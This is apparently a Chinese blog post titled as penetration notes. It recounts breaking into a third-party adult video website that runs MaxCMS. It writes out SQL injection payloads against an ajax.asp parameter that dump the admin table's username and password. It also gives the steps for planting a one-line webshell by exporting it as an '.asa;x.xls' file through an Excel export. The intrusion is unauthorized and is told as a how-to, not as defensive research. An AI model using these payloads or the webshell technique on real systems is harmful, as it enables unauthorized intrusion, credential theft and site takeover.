• 【渗透笔记】拿下某小H网的全过程


    自从班上A片小王子的7个T资源被封了以后,本小白为造福全班同学,尝试拿下个小H网,先用webrobot搜某些只有小H网才会出现的关键词

    本以为直接导出放御剑里跑就行了,然并软。于是用awvs扫了一下,也没什么用。从cms下手吧放进椰树里

    百度一下maxcms的漏洞看到这样一条 http://www.2cto.com/index.php/364.html发现注入点 http://www.xxxxx.com/inc/ajax.asp?action=videoscore&id=11 ,放进sqlmap里跑

    当然没那么容易出了点小错误

    没办法,试试最近刚学的联合注入。先猜表名,输入%20and%20exists%20(select%20*%20from%20m_manager)存在表名m_manager

    把前面的*改成列名,结合前面sqlmap跑出的信息,猜到列名是m_username和m_pwd

    判断列的长度,发现3为正常,4为错误,说明长度为3

    %20and%201=2%20union%20select%201,2,3%20from%20m_manager,把2和3替换成m_username和m_pwd,直接爆出

    好坏的cms呀

    进后台了

    接下来就是穿马了,结果00截断截不了,本来想在网站配置插一句话的,试了好多次都没什么用~~后台已经插坏好几个了~~正当我绝望时,好友分享给我这http://bybmo.lofter.com/post/1d6686be_8725023?sharefrom=lofter-android-4.7.3&shareto=qq

    create table cmd (a varchar(50)) //建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50 NO.2insert into cmd (a) values ('一句话木马')//在表cmd的a字段插入一句话木马 NO.3select * into [a] in 'd:wwwrootxxxxwwwroot1.asa;x.xls' 'excel 4.0;' from cmd//把cmd表a的内容导出到路径d:wwwrootxxxxwwwroot\的EXCEL文件,网站物理路径可以在首页找到NO.4drop table cmd//删除建立的cmd表 http://www.XXX.com/1.asa;x.xls

    发现其实影音先锋码可以直接在后台找到的

  • 相关阅读:
    LeetCode with Python -> Linked List
    拼多多2018校招编程题汇总 Python实现
    Windows命令行中pip install jieba,但没有安装到anaconda3中
    sklearn快速入门
    人工神经网络在肺结核诊断中应用的研究进展
    Leetcode with Python -> Array
    标签语义空间生成
    leetcode with python -> tree
    读书笔记——中文信息处理发展报告(2016)
    移动开发学习记录
  • 原文地址:https://www.cnblogs.com/cnhacker/p/6999101.html
Copyright © 2020-2023  润新知